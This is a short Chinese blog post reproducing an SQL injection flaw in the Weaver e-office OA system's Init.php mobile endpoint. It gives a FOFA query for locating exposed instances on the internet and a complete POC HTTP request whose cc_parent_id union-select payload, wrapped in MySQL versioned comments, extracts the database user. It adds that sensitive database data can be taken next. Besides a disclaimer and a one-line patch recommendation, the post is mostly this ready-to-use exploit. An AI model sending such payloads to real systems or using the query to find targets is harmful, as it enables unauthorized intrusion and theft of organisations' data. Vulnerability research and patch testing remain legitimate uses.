泛微e-office SQL注入漏洞复现
·
前言
此文章仅用于技术交流,严禁用于对外发起恶意攻击!!!
一、产品简介
泛微e-office系统是标准、易用、快速部署上线的专业协同OA软件,国内协同OA办公领域领导品牌,致力于为企业用户提供专业OA办公系统、移动OA应用等协同OA整体解决方案。
二、漏洞描述
该系统的Init.php接口存在SQL注入漏洞,攻击者可获取用户敏感信息
三、影响范围
未知
四、复现环境
FOFA:app=“泛微-EOffice”
五、漏洞复现
1.访问存在漏洞的网站,抓包

2.POC
POST /E-mobile/App/Init.php?m=getSelectList_Crm HTTP/1.1
Host: IP
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
cc_parent_id=-999 /*!50000union*/ /*!50000select*/ 1,user()#
3.成功

六、漏洞利用
后续可获取数据库敏感信息
七、修复建议
请及时更新该系统到最新版本
参考链接
https://blog.csdn.net/holyxp/article/details/134175651
更多推荐
所有评论(0)